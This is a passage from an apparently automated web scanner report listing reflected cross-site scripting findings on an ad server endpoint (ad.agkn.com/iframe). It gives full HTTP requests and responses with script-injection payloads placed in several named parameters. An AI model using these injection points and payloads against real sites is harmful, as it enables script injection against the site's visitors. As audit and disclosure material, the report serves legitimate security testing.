Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA8BArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flJrtfJ6qWCjAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcchttp://ad.agkn.com/interaction!che=392546480?imid=5939040586662764707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81d44"><script>alert(1)</script>6ee1469f996 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAAwBArwBATUBC%2FEB0AADAUIBBoABQwEGgAFBAQaAAQK8fnjlj%2BuxPLfUAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1603187548?imid=8711527296671725524&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Con
...[SNIP]...

2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db7ef"><script>alert(1)</script>a402f89f56b was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:05 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJRAAAAABABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjT3r%2FI4Pw%2BjAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:05 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect=http://ad.agkn.com/interaction!che=1794660149?imid=3816712664080388003&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc
...[SNIP]...

2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dd2"><script>alert(1)</script>488066488aa was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAA4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjzlQUQ4QovRAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1106824953?imid=4387985173199883217&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 372d8"%3balert(1)//04ade7f7217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372d8";alert(1)//04ade7f7217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8"%3balert(1)//04ade7f7217=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:08 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJUAAAAABYBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkadB%2FcIop4dAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:08 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8";alert(1)//04ade7f7217=1http://ad.agkn.com/interaction!che=1298692797?imid=5088231911581720093&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f604e"><script>alert(1)</script>3e78bbef9e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:07 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJTAAAAABQBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjtIPx4EjM5IAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:07 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1http://ad.agkn.com/interaction!che=441258755?imid=4271733644718820936&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5798"><script>alert(1)</script>bbf67718b2e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2e HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:06 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
